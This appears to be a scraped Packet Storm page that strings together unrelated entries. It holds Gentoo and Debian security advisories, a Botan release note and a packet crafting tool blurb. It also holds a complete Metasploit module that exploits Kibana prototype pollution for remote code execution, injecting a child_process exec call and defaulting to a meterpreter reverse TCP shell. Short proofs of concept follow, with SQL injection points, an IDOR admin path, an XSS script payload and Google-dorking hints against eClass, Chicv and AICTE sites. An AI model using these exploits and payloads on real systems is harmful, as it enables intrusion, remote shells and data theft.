Gentoo Linux Security Advisory 202310-6 - Multiple vulnerabilities have been discovered in Heimdal, the worst of which could lead to remote code execution on a KDC. Versions greater than or equal to 7.8.0-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Heimdal: Multiple Vulnerabilities  
     Date: October 08, 2023  
     Bugs: #881429, #893722  
       ID: 202310-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Heimdal, the worst of  
which could lead to remote code execution on a KDC.

Background  
=========  
Heimdal is a free implementation of Kerberos 5.

Affected packages  
================  
Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
app-crypt/heimdal  < 7.8.0-r1    >= 7.8.0-r1

Description  
==========  
Multiple vulnerabilities have been discovered in Heimdal, the worst of  
which could lead to remote code execution on a Kerberos Domain  
Controller.

Please review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Cross-realm trust vulnerability in Heimdal users should upgrade to  
the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-crypt/heimdal-7.8.0-r1"

References  
=========  
[ 1 ] CVE-2019-14870  
      https://nvd.nist.gov/vuln/detail/CVE-2019-14870  
[ 2 ] CVE-2021-44758  
      https://nvd.nist.gov/vuln/detail/CVE-2021-44758  
[ 3 ] CVE-2022-3437  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3437  
[ 4 ] CVE-2022-3671  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3671  
[ 5 ] CVE-2022-41916  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41916  
[ 6 ] CVE-2022-42898  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42898  
[ 7 ] CVE-2022-44640  
      https://nvd.nist.gov/vuln/detail/CVE-2022-44640  
[ 8 ] CVE-2022-44758  
      https://nvd.nist.gov/vuln/detail/CVE-2022-44758  
[ 9 ] CVE-2022-45142  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45142

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-06

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-06

Gentoo Linux Security Advisory 202310-5 - A vulnerability has been found in dav1d which could result in denial of service. Versions greater than or equal to 1.2.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: dav1d: Denial of Service  
     Date: October 08, 2023  
     Bugs: #906107  
       ID: 202310-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in dav1d which could result in denial of  
service.

Background  
=========  
dav1d is an AV1 decoder.

Affected packages  
================  
Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
media-libs/dav1d  < 1.2.0       >= 1.2.0

Description  
==========  
In some circumstances, dav1d might treat an invalid frame as valid,  
resulting in a crash.

Impact  
=====  
Malformed frame data can result in a denial of service.

Workaround  
=========  
Users should avoid parsing untrusted video with dav1d.

Resolution  
=========  
All dav1d users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/dav1d-1.2.0"

References  
=========  
[ 1 ] CVE-2023-32570  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32570

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-05

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-05

Debian Linux Security Advisory 5519-1 - Maxim Suhanov discovered multiple vulnerabilities in GURB2's code to handle NTFS filesystems, which may result in a Secure Boot bypass.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5519-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoOctober 06, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : grub2CVE ID         : CVE-2023-4692 CVE-2023-4693Maxim Suhanov discovered multiple vulnerabilities in GURB2's code tohandle NTFS filesystems, which may result in a Secure Boot bypass.For the oldstable distribution (bullseye), these problems have been fixedin version 2.06-3~deb11u6.For the stable distribution (bookworm), these problems have been fixed inversion 2.06-13+deb12u1.We recommend that you upgrade your grub2 packages.For the detailed security status of grub2 please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/grub2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmUgWX5fFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0S1bxAAoIlLLu0nPXCGZRJydLVpVdkgkosdnlLxMR/oN2rTAWG6f1I2VatAPSKErBtRSi32TSuLW3Ir6lY+O7Jk7ONKGGbh4CSD1EcFb1w7sylwHZY5mtpMfS7tCDc2PAasJXSlMXlzRjO0pPCpazYHHmBYAap/JBVc89ZepwleegAoL1UoIaE+eCRliLS9H00CWdIsnr7F22HNsN+SYyK0itHyqtgx6M1F5v7eXaGd5bPbN1mCTV8okBkCEU7hp14+sEQtrFLLPW1WyBzSEMPWtgrVcOgGy2wBqZRK5UoCUDBohCyjcZFig7ZQ6vuTYTbDMwxBeI6ycK8BpccD+8kZqzNKjjgUPlvu92FxflqYjg98GIa9rcBhETEbare5RnwhQteYbr+Yn90hng5xvEXu7CC+7nKm+X4jzM2lHRGm56WCeE26+DQ0JB8J2yu+donTd+vhgLfTgADb9V0nFJh0hecHqh5/n0Jhu5u/ImxhDzbcqlfijNAl42udQmeQa2V6sBWJxabgJhEGeazEGuWHqpqXJk9dc8xuqWYYGmv4Fioi+2TVAI8lsnRbX4qp0MU2hrOCHsnccV0VOvENV3dTzgRO5UqUI0xC88FLckz5JQUjh81dGvezuQ1NQNSEAWamwBka/lqyBTg7AMQEwsiximYYyO4DkSBslzMsNGi5pZCc8rk=+IHG-----END PGP SIGNATURE-----

Debian Security Advisory 5519-1

Kibana versions prior to 7.6.3 suffer from a prototype pollution bug within the Upgrade Assistant. By setting a new constructor.prototype.sourceURL value you can execute arbitrary code. Code execution is possible through two different ways. Either by sending data directly to Elastic, or using Kibana to submit the same queries. Either method enters the polluted prototype for Kibana to read. Kibana will either need to be restarted, or collection happens (unknown time) for the payload to execute. Once it does, cleanup must delete the .kibana_1 index for Kibana to restart successfully. Once a callback does occur, cleanup will happen allowing Kibana to be successfully restarted on next attempt.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ManualRanking # causes service to not respond until cleanup and reboot  include Msf::Exploit::Remote::HttpClient  # decided not to use autocheck since it doesn't work for both targets  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Kibana Upgrade Assistant Telemetry Collector Prototype Pollution',        'Description' => %q{          Kibana before version 7.6.3 suffers from a prototype pollution bug within the          Upgrade Assistant. By setting a new constructor.prototype.sourceURL value we're          able to execute arbitrary code.          Code execution is possible through two different ways. Either by sending data          directly to Elastic, or using Kibana to submit the same queries. Either method          enters the polluted prototype for Kibana to read.          Kibana will either need to be restarted, or collection happens (unknown time) for          the payload to execute. Once it does, cleanup must delete the .kibana_1 index          for Kibana to restart successfully. Once a callback does occur, cleanup will          happen allowing Kibana to be successfully restarted on next attempt.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'Alex Brasetvik (alexbrasetvik)' # original PoC, analysis        ],        'References' => [          [ 'URL', 'https://hackerone.com/reports/852613'],        ],        'Privileged' => false,        'Arch' => [ ARCH_CMD ],        'Platform' => [ 'linux' ],        'Type' => :nix_cmd,        'DefaultOptions' => {          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',          'WfsDelay' => 1800 # 30min        },        'Targets' => [          [ 'ELASTIC', {}], # target kibana through a direct elastic connection          [ 'KIBANA', {}] # target kibana through the dev console to implant elastic data        ],        'DisclosureDate' => '2020-04-17',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SERVICE_DOWN], # down until cleanup and reboot          'Reliability' => [],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(9200), # default to elastic port, kibana is 5601        OptString.new('USERNAME', [ false, 'Elastic User to login with', '']),        OptString.new('PASSWORD', [ false, 'Elastic Password to login with', '']),        OptString.new('TARGETURI', [ true, 'The URI of the Kibana/Elastic Application', '/'])      ]    )  end  # https://stackoverflow.com/a/4899857  def time_rand(from = Time.local(2020, 6, 28), to = Time.now)    Time.at(from + rand * (to.to_f - from.to_f)).strftime('%FT%T.000Z')    # outputs 2020-04-17T20:47:40.800Z format  end  # This is how it should be done, but it will crash the session. Leaving here in case someone figures out how to not crash the session  # it may also only crash when on docker, and may be fine elsewehre. Regardless, good code to not lose just in case.  def kibana_cleanup    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'api', 'console', 'proxy'),      'method' => 'POST',      'headers' => {        'kbn-xsrf' => @xsrf      },      'ctype' => 'application/json',      'vars_get' => {        'path' => '.kibana_1', # URI for the elastic request        'method' => 'DELETE' # method for the elastic query      }    )    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200  end  def elastic_cleanup    request = {      'uri' => normalize_uri(target_uri.path, '.kibana*'),      'method' => 'DELETE'    }    request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present?    res = send_request_cgi(request)    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200  end  def execute_command    case target.name    when 'ELASTIC'      request = {        'uri' => normalize_uri(target_uri.path, '.kibana_1', '_doc', 'upgrade-assistant-telemetry:upgrade-assistant-telemetry'),        'method' => 'PUT',        'ctype' => 'application/json',        'data' => telemetry_data.to_json      }      request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present?      res = send_request_cgi(request)    when 'KIBANA'      res = send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'api', 'console', 'proxy'),        'method' => 'POST',        'headers' => {          'kbn-xsrf' => @xsrf        },        'ctype' => 'application/json',        'vars_get' => {          'path' => '.kibana_1/_doc/upgrade-assistant-telemetry:upgrade-assistant-telemetry', # URI for the elastic request          'method' => 'PUT' # method for the elastic query        },        'data' => telemetry_data.to_json      )    end    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 201  end  def telemetry_data    {      'upgrade-assistant-telemetry' => {        'ui_open.overview' => 1,        'ui_open.cluster' => 1,        'ui_open.indices' => 1,        'constructor.prototype.sourceURL' => "\u2028\u2029\nglobal.process.mainModule.require('child_process').exec('#{payload.encoded}')"      },      'type' => 'upgrade-assistant-telemetry',      'updated_at' => time_rand    }  end  def kibana_create_index    # if the index already exists, this will fail which is fine, we just need it to exist.    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'api', 'console', 'proxy'),      'method' => 'POST',      'ctype' => 'application/json',      'headers' => {        'kbn-xsrf' => @xsrf      },      'vars_get' => {        'path' => '.kibana_1', # URI for the elastic request        'method' => 'PUT' # method for the elastic query      }    )    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?    if res.code == 400      vprint_status('Index already exists')      return    end    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200  end  def elastic_create_index    request = {      'uri' => normalize_uri(target_uri.path, '.kibana_1'),      'method' => 'PUT'    }    request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present?    res = send_request_cgi(request)    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?    if res.code == 400      vprint_status('Index already exists')      return    end    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200  end  def kibana_send_mapping    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'api', 'console', 'proxy'),      'method' => 'POST',      'ctype' => 'application/json',      'headers' => {        'kbn-xsrf' => @xsrf      },      'vars_get' => {        'path' => '.kibana_1/_mappings', # URI for the elastic request        'method' => 'PUT' # method for the elastic query      },      'data' => mapping_data.to_json    )    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200  end  def elastic_send_mapping    request = {      'uri' => normalize_uri(target_uri.path, '.kibana_1', '_mappings'),      'method' => 'PUT',      'ctype' => 'application/json',      'data' => mapping_data.to_json    }    request['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) if datastore['USERNAME'].present?    res = send_request_cgi(request)    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200  end  def mapping_data    {      'properties' => {        'upgrade-assistant-telemetry' => {          'properties' => {            'constructor' => {              'properties' => {                'prototype' => {                  'properties' => {                    'sourceURL' => {                      'type' => 'text',                      'fields' => {                        'keyword' => {                          'type' => 'keyword',                          'ignore_above' => 256                        }                      }                    }                  }                }              }            },            'features' => {              'properties' => {                'deprecation_logging' => {                  'properties' => {                    'enabled' => {                      'type' => 'boolean',                      'null_value' => true                    }                  }                }              }            },            'ui_open' => {              'properties' => {                'cluster' => {                  'type' => 'long',                  'null_value' => 0                },                'indices' => {                  'type' => 'long',                  'null_value' => 0                },                'overview' => {                  'type' => 'long',                  'null_value' => 0                }              }            },            'ui_reindex' => {              'properties' => {                'close' => {                  'type' => 'long',                  'null_value' => 0                },                'open' => {                  'type' => 'long',                  'null_value' => 0                },                'start' => {                  'type' => 'long',                  'null_value' => 0                },                'stop' => {                  'type' => 'long',                  'null_value' => 0                }              }            }          }        }      }    }  end  def check    if target == targets[0] # elastic      return CheckCode::Unknown('Unable to determine Kibana version from Elastic database')    end    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'app', 'kibana'),      'method' => 'GET',      'keep_cookies' => true    )    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200    # this pulls a big JSON blob that we need as it has the version    unless %r{<kbn-injected-metadata data="([^"]+)"></kbn-injected-metadata>} =~ res.body      return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version")    end    version_json = CGI.unescapeHTML(Regexp.last_match(1))    begin      json_body = JSON.parse(version_json)    rescue JSON::ParserError      return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version")    end    return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version") if json_body['version'].nil?    @version = json_body['version']    if Rex::Version.new(@version) < Rex::Version.new('7.6.3')      return CheckCode::Appears("Exploitable Version Detected: #{@version}")    end    CheckCode::Safe("Unexploitable Version Detected: #{@version}")  end  def exploit    @clean = true    fail_with(Failure::BadConfig, 'A password has been defined without a username') if datastore['USERNAME'].blank? && !datastore['PASSWORD'].blank?    case target.name    when 'ELASTIC'      print_warning('RPORT should most likely be set to 9200 when exploiting the ELASTIC target') if datastore['RPORT'] != 9200      print_status('Creating index')      elastic_create_index      print_status('Sending index map')      elastic_send_mapping    when 'KIBANA'      print_warning('RPORT should most likely be set to 5601 when exploiting the KIBANA target') if datastore['RPORT'] != 5601      # xsrf for unlicensed kibana seems to just be kibana... at least for 7.6.2      # https://discuss.elastic.co/t/where-can-i-get-the-correct-kbn-xsrf-value-for-my-plugin-http-requests/158725/3      @xsrf = 'kibana'      print_status('Creating index')      kibana_create_index      print_status('Sending index map')      kibana_send_mapping    end    print_status('Sending telemetry data with payload')    execute_command    print_status("Waiting #{datastore['WfsDelay']} seconds for shell (kibana restart/cleanup)")  end  def cleanup    return unless @clean    if target.name == 'KIBANA'      print_error('Cleanup must happen on the Elastic Database for Kibana to start. You need to DELETE /.kibana_1')      # kibana_cleanup      return    end    print_status('Removing telemetry data to prevent Kibana locking on restart')    elastic_cleanup  endend

Kibana Prototype Pollution / Remote Code Execution

Botan is a C++ library of cryptographic algorithms, including AES, DES, SHA-1, RSA, DSA, Diffie-Hellman, and many others. It also supports X.509 certificates and CRLs, and PKCS #10 certificate requests, and has a high level filter/pipe message processing system. The library is easily portable to most systems and compilers, and includes a substantial tutorial and API reference. This is the current stable release.

**Botan C++ Crypto Algorithms Library 3.2.0**

Posted Oct 9, 2023

Site botan.randombit.net

Botan is a C++ library of cryptographic algorithms, including AES, DES, SHA-1, RSA, DSA, Diffie-Hellman, and many others. It also supports X.509 certificates and CRLs, and PKCS #10 certificate requests, and has a high level filter/pipe message processing system. The library is easily portable to most systems and compilers, and includes a substantial tutorial and API reference. This is the current stable release.

Changes: Added support for post-quantum secure key exchange in TLS 1.3. Added support for TLS PSK. Added a first class interface for XOFs. Added KMAC from NIST SP 800-185. Added cSHAKE XOF. Added improved APIs for key encapsulation. Many other updates, fixes, and improvements listed in the release notes.

tags | library

SHA-256 | 049c847835fcf6ef3a9e206b33de05dd38999c325e247482772a5598d9e5ece3

Download | Favorite | View

Botan C++ Crypto Algorithms Library 3.2.0

Simple Packet Sender (SPS) is a Linux packet crafting tool. It supports IPv4, IPv6 (but not extension headers yet), and tunneling IPv6 over IPv4. Written in C on Linux with GUI built using GTK+. Both source and binaries are included. Features include packet crafting and sending one, multiple, or flooding packets of type TCP, ICMP, or UDP. All values within ethernet frame can be modified arbitrarily. Supports TCP, ICMP and UDP data as well, with input from either keyboard as UTF-8/ASCII, keyboard as hexadecimal, or from file. Various other features exist as well.

Simple Packet Sender 5.0

eClass Junior version 4.0 suffers from a remote SQL injection vulnerability.

**eClass Junior 4.0 SQL Injection**

Posted Oct 9, 2023

Authored by indoushka

eClass Junior version 4.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | fe25bf20628b95e728482b08a8d3f9ce6bd4e732844de33554a5951468322a2a

Download | Favorite | View

**eClass Junior 4.0 SQL Injection**

    ====================================================================================================================================| # Title     : eClass Junior 4.0 Sql injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.eclass.com.hk/en/product/eclass-junior/                                                                |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /gallery_detail.php?cid=55 <===== inject here[+] http://127.0.0.www.cls.eduhk/tc/gallery_detail.php?cid=55[+] Panel : /templates/index.php?err=1&DirectLink= or /ad_min_man/login.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,456)
*   Arbitrary (16,316)
*   BBS (2,859)
*   Bypass (1,764)
*   CGI (1,029)
*   Code Execution (7,343)
*   Conference (680)
*   Cracker (843)
*   CSRF (3,352)
*   DoS (23,623)
*   Encryption (2,372)
*   Exploit (52,159)
*   File Inclusion (4,230)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,797)
*   Intrusion Detection (895)
*   Java (3,054)
*   JavaScript (865)
*   Kernel (6,760)
*   Local (14,525)
*   Magazine (586)
*   Overflow (12,775)
*   Perl (1,423)
*   PHP (5,156)
*   Proof of Concept (2,345)
*   Protocol (3,623)
*   Python (1,543)
*   Remote (30,920)
*   Root (3,598)
*   Rootkit (513)
*   Ruby (612)
*   Scanner (1,644)
*   Security Tool (7,912)
*   Shell (3,201)
*   Shellcode (1,216)
*   Sniffer (896)
*   Spoof (2,213)
*   SQL Injection (16,422)
*   TCP (2,417)
*   Trojan (687)
*   UDP (896)
*   Virus (666)
*   Vulnerability (31,915)
*   Web (9,732)
*   Whitepaper (3,753)
*   x86 (965)
*   XSS (18,011)
*   Other

**File Archives**

*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,026)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,858)
*   Fedora (1,692)
*   FreeBSD (1,246)
*   Gentoo (4,347)
*   HPUX (879)
*   iOS (358)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (46,943)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (486)
*   RedHat (13,974)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,974)
*   UNIX (9,323)
*   UnixWare (186)
*   Windows (6,591)
*   Other

eClass Junior 4.0 SQL Injection

eClass IP version 2.5 suffers from a remote SQL injection vulnerability.

**eClass IP 2.5 SQL Injection**

Posted Oct 9, 2023

Authored by indoushka

eClass IP version 2.5 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | b711babfc66671ea5103fe26d521747c60621f2c26be69bc9fb4ef7463b6da31

Download | Favorite | View

**eClass IP 2.5 SQL Injection**

    ====================================================================================================================================| # Title     : eClass IP 2.5 Sql injection Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.eclass.com.hk/en/product/eclass-ip/                                                                    |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /gallery_detail.php?cid=55&id=161 <===== inject here[+] http://127.0.0.www.cls.eduhk/tc/gallery_detail.php?cid=55&id=161[+] Panel : /templates/index.php?err=1&DirectLink= or /ad_min_man/login.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,456)
*   Arbitrary (16,316)
*   BBS (2,859)
*   Bypass (1,764)
*   CGI (1,029)
*   Code Execution (7,343)
*   Conference (680)
*   Cracker (843)
*   CSRF (3,352)
*   DoS (23,623)
*   Encryption (2,372)
*   Exploit (52,159)
*   File Inclusion (4,230)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,797)
*   Intrusion Detection (895)
*   Java (3,054)
*   JavaScript (865)
*   Kernel (6,760)
*   Local (14,525)
*   Magazine (586)
*   Overflow (12,775)
*   Perl (1,423)
*   PHP (5,156)
*   Proof of Concept (2,345)
*   Protocol (3,623)
*   Python (1,543)
*   Remote (30,920)
*   Root (3,598)
*   Rootkit (513)
*   Ruby (612)
*   Scanner (1,644)
*   Security Tool (7,912)
*   Shell (3,201)
*   Shellcode (1,216)
*   Sniffer (896)
*   Spoof (2,213)
*   SQL Injection (16,422)
*   TCP (2,417)
*   Trojan (687)
*   UDP (896)
*   Virus (666)
*   Vulnerability (31,915)
*   Web (9,732)
*   Whitepaper (3,753)
*   x86 (965)
*   XSS (18,011)
*   Other

**File Archives**

*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,026)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,858)
*   Fedora (1,692)
*   FreeBSD (1,246)
*   Gentoo (4,347)
*   HPUX (879)
*   iOS (358)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (46,943)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (486)
*   RedHat (13,974)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,974)
*   UNIX (9,323)
*   UnixWare (186)
*   Windows (6,591)
*   Other

eClass IP 2.5 SQL Injection

Chicv Management System Login version 4.5.6 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Chicv Management System Login v4.5.6 IDOR Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            | | # Vendor    : https://chicv.com/                                                                                                 |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/#/home[+] https://127.0.0.wwwjustfashionnowcom/admin/#/homeGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Chicv Management System Login 4.5.6 Insecure Direct Object Reference

Aicte India LMS version 3.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Aicte india LMS 3.0 XSS Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.facebook.com/OfficialAICTE/                                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /committee.php?n=ANTI-RAGGING'"()%26%25<acx><ScRiPt >prompt(926233)</ScRiPt>[+] http://vtcbcsreduin/committee.php?n=ANTI-RAGGING%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(926233)%3C/ScRiPt%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Source

Packet Storm